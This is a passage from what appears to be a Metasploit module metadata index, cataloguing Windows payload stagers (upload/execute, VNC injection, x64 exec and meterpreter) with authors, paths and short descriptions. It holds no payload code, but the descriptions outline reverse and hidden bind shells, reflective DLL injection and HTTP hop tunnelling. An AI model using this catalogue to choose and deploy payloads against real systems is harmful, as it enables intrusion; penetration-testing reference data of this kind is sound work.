"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb",
"is_install_path": true,
"ref_name": "windows/upexec/reverse_tcp_dns",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/reverse_tcp_rc4": {
"name": "Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/upexec/reverse_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"mihi",
"RageLtMan"
],
"description": "Uploads an executable and runs it (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/upexec/reverse_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/upexec/reverse_tcp_rc4_dns": {
"name": "Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)",
"full_name": "payload/windows/upexec/reverse_tcp_rc4_dns",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"mihi",
"RageLtMan"
],
"description": "Uploads an executable and runs it (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb",
"is_install_path": true,
"ref_name": "windows/upexec/reverse_tcp_rc4_dns",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/upexec/reverse_tcp_uuid": {
"name": "Windows Upload/Execute, Reverse TCP Stager with UUID Support",
"full_name": "payload/windows/upexec/reverse_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"OJ Reeves"
],
"description": "Uploads an executable and runs it (staged). Connect back to the attacker with UUID Support",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/upexec/reverse_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/reverse_udp": {
"name": "Windows Upload/Execute, Reverse UDP Stager with UUID Support",
"full_name": "payload/windows/upexec/reverse_udp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"RageLtMan <rageltman@sempervictus>"
],
"description": "Uploads an executable and runs it (staged). Connect back to the attacker with UUID Support",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-13 14:34:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_udp.rb",
"is_install_path": true,
"ref_name": "windows/upexec/reverse_udp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/bind_hidden_ipknock_tcp": {
"name": "VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager",
"full_name": "payload/windows/vncinject/bind_hidden_ipknock_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Listen for a connection. First, the port will need to be knocked from\n the IP defined in KHOST. This IP will work as an authentication method\n (you can spoof it with tools like hping). After that you could get your\n shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n hide the shellcode",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/bind_hidden_ipknock_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/bind_hidden_tcp": {
"name": "VNC Server (Reflective Injection), Hidden Bind TCP Stager",
"full_name": "payload/windows/vncinject/bind_hidden_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/bind_hidden_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/bind_ipv6_tcp": {
"name": "VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)",
"full_name": "payload/windows/vncinject/bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Listen for an IPv6 connection (Windows x86)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/bind_ipv6_tcp_uuid": {
"name": "VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)",
"full_name": "payload/windows/vncinject/bind_ipv6_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"OJ Reeves"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Listen for an IPv6 connection with UUID Support (Windows x86)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/bind_ipv6_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/bind_named_pipe": {
"name": "VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager",
"full_name": "payload/windows/vncinject/bind_named_pipe",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"UserExistsError"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Listen for a pipe connection (Windows x86)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-27 19:24:51 +0000",
"path": "/modules/payloads/stagers/windows/bind_named_pipe.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/bind_named_pipe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/bind_nonx_tcp": {
"name": "VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)",
"full_name": "payload/windows/vncinject/bind_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"vlad902 <vlad902@gmail.com>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Listen for a connection (No NX)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/bind_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/bind_tcp": {
"name": "VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)",
"full_name": "payload/windows/vncinject/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Listen for a connection (Windows x86)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/bind_tcp_rc4": {
"name": "VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/vncinject/bind_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"mihi",
"RageLtMan"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Listen for a connection",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/bind_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/vncinject/bind_tcp_uuid": {
"name": "VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)",
"full_name": "payload/windows/vncinject/bind_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"OJ Reeves"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Listen for a connection with UUID Support (Windows x86)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/bind_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/find_tag": {
"name": "VNC Server (Reflective Injection), Find Tag Ordinal Stager",
"full_name": "payload/windows/vncinject/find_tag",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"skape <mmiller@hick.org>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Use an established connection",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/findtag_ord.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/find_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/reverse_hop_http": {
"name": "VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager",
"full_name": "payload/windows/vncinject/reverse_hop_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"scriptjunkie <scriptjunkie@scriptjunkie.us>",
"bannedit <bannedit@metasploit.com>",
"hdm <x@hdm.io>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). \n Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\n data/hop/hop.php to the PHP server you wish to use as a hop.",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_hop_http.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/reverse_hop_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/reverse_http": {
"name": "VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)",
"full_name": "payload/windows/vncinject/reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Tunnel communication over HTTP (Windows wininet)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-08 06:24:02 +0000",
"path": "/modules/payloads/stagers/windows/reverse_http.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/reverse_http_proxy_pstore": {
"name": "VNC Server (Reflective Injection), Reverse HTTP Stager Proxy",
"full_name": "payload/windows/vncinject/reverse_http_proxy_pstore",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Tunnel communication over HTTP",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/reverse_http_proxy_pstore",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/reverse_ipv6_tcp": {
"name": "VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)",
"full_name": "payload/windows/vncinject/reverse_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker over IPv6",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/reverse_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/reverse_nonx_tcp": {
"name": "VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)",
"full_name": "payload/windows/vncinject/reverse_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"vlad902 <vlad902@gmail.com>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker (No NX)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/reverse_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/reverse_ord_tcp": {
"name": "VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)",
"full_name": "payload/windows/vncinject/reverse_ord_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"spoonm <spoonm@no$email.com>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/reverse_ord_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/reverse_tcp": {
"name": "VNC Server (Reflective Injection), Reverse TCP Stager",
"full_name": "payload/windows/vncinject/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/reverse_tcp_allports": {
"name": "VNC Server (Reflective Injection), Reverse All-Port TCP Stager",
"full_name": "payload/windows/vncinject/reverse_tcp_allports",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/reverse_tcp_allports",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/reverse_tcp_dns": {
"name": "VNC Server (Reflective Injection), Reverse TCP Stager (DNS)",
"full_name": "payload/windows/vncinject/reverse_tcp_dns",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"RageLtMan"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/reverse_tcp_dns",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/reverse_tcp_rc4": {
"name": "VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/vncinject/reverse_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"mihi",
"RageLtMan"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/reverse_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/vncinject/reverse_tcp_rc4_dns": {
"name": "VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)",
"full_name": "payload/windows/vncinject/reverse_tcp_rc4_dns",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"mihi",
"RageLtMan"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/reverse_tcp_rc4_dns",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/vncinject/reverse_tcp_uuid": {
"name": "VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support",
"full_name": "payload/windows/vncinject/reverse_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"OJ Reeves"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker with UUID Support",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/reverse_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/reverse_udp": {
"name": "VNC Server (Reflective Injection), Reverse UDP Stager with UUID Support",
"full_name": "payload/windows/vncinject/reverse_udp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"RageLtMan <rageltman@sempervictus>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker with UUID Support",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-13 14:34:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_udp.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/reverse_udp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/reverse_winhttp": {
"name": "VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp)",
"full_name": "payload/windows/vncinject/reverse_winhttp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Tunnel communication over HTTP (Windows winhttp)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/stagers/windows/reverse_winhttp.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/reverse_winhttp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/exec": {
"name": "Windows x64 Execute Command",
"full_name": "payload/windows/x64/exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Execute an arbitrary command (Windows x64)",
"references": [
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/x64/exec.rb",
"is_install_path": true,
"ref_name": "windows/x64/exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/loadlibrary": {
"name": "Windows x64 LoadLibrary Path",
"full_name": "payload/windows/x64/loadlibrary",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"scriptjunkie",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Load an arbitrary x64 library path",
"references": [
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/x64/loadlibrary.rb",
"is_install_path": true,
"ref_name": "windows/x64/loadlibrary",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/messagebox": {
"name": "Windows MessageBox x64",
"full_name": "payload/windows/x64/messagebox",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"pasta <jaguinaga@infobytesec.com>"
],
"description": "Spawn a dialog via MessageBox using a customizable title, text & icon",
"references": [
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-19 18:19:24 +0000",
"path": "/modules/payloads/singles/windows/x64/messagebox.rb",
"is_install_path": true,
"ref_name": "windows/x64/messagebox",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter/bind_ipv6_tcp": {
"name": "Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager",
"full_name": "payload/windows/x64/meterpreter/bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Listen for an IPv6 connection (Windows x64)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter/bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter/bind_ipv6_tcp_uuid": {
